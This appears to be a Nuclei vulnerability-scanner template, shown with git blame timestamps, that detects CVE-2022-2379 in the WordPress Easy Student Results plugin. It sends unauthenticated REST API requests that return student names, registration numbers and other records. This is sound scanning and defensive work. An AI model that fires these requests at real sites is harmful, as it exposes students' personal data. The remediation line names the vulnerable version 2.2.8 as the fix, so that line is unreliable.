nuclei-templates/http/cves/2022/CVE-2022-2379.yaml

71 lines
2.6 KiB
YAML
Raw Normal View History

2022-11-09 14:18:37 +00:00
id: CVE-2022-2379
info:
name: WordPress Easy Student Results <=2.2.8 - Improper Authorization
2022-11-09 14:18:37 +00:00
author: theamanrawat
severity: high
description: |
WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can gain access to sensitive student information, potentially compromising their privacy and security.
2023-09-06 11:59:08 +00:00
remediation: |
Update to the latest version of the WordPress Easy Student Results plugin (2.2.8) to fix the improper authorization vulnerability.
2022-11-09 14:18:37 +00:00
reference:
- https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6
- https://wordpress.org/plugins/easy-student-results/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2379
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/soxoj/information-disclosure-writeups-and-pocs
2022-11-10 16:25:24 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-11-10 16:25:24 +00:00
cve-id: CVE-2022-2379
cwe-id: CWE-862
epss-score: 0.02846
epss-percentile: 0.90702
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:*
2022-11-10 16:25:24 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: easy_student_results_project
product: easy_student_results
2023-09-06 11:59:08 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,easy_student_results_project
2022-11-09 14:18:37 +00:00
http:
2022-11-09 14:18:37 +00:00
- raw:
- |
GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1
Host: {{Hostname}}
2022-11-10 16:25:24 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2022-11-10 16:25:24 +00:00
matchers-condition: and
2022-11-09 14:18:37 +00:00
matchers:
- type: word
2022-11-10 16:25:24 +00:00
part: body_1
2022-11-09 14:18:37 +00:00
words:
2022-11-10 16:25:24 +00:00
- '"departments":'
2022-11-09 14:18:37 +00:00
- 'batches":'
condition: and
- type: word
part: body_2
words:
- 'meta_data'
2022-11-10 16:25:24 +00:00
- '"name":"'
- '"registration_no":'
2022-11-09 14:18:37 +00:00
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
2022-11-10 16:25:24 +00:00
- 200
# digest: 4a0a00473045022100f64124133407f75d8bb262919179f2c3a4c57c530c8031ad726a956489b3aae802202e35452a7f46e4c16142d1dcbf6a666a30247e235d323c3a12e3bb5b0d060a22:922c64590222798bb761d5b6d8e72950